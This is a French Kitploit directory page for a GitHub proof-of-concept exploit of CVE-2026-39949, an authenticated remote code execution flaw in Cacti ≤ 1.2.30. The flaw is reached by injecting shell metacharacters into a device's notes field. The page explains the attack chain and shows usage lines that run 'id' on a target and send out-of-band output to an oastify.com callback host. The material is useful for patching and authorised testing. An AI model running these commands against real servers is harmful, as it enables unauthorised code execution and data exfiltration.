Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/lukehebe/cve-2026-39949
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHublukehebe/cve-2026-39949

CVE-2026-39949

Cacti ≤ 1.2.30 RCE authentifié - Injection de variable d'hôte

Voir le dépôt
1il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-39949 : Exécution de code à distance authentifiée dans Cacti via l'injection de variable d'hôte

Résumé

Une vulnérabilité d'injection de commandes système dans Cacti ≤ 1.2.30 permet à tout utilisateur authentifié disposant des privilèges de création d'appareils et de modèles de graphiques d'exécuter des commandes arbitraires sur le serveur sous-jacent. La faille existe car les champs de métadonnées d'hôte contrôlés par l'utilisateur (plus précisément le champ de notes de l'appareil) sont substitués dans les arguments de ligne de commande RRDtool via le moteur de remplacement de variables de Cacti, sans aucune désinfection ni échappement. Un attaquant peut injecter des métacaractères shell dans le champ de notes, créer un modèle de graphique référençant la variable |host_notes|, et déclencher le rendu du graphique pour obtenir une exécution de code à distance complète en tant qu'utilisateur du serveur web.

Utilisation :

root@kitploit:~
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --cmd 'id'

Exécution de commande OOB :

root@kitploit:~
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --oob your.oastify.com
image
image
image
Télécharger l’outil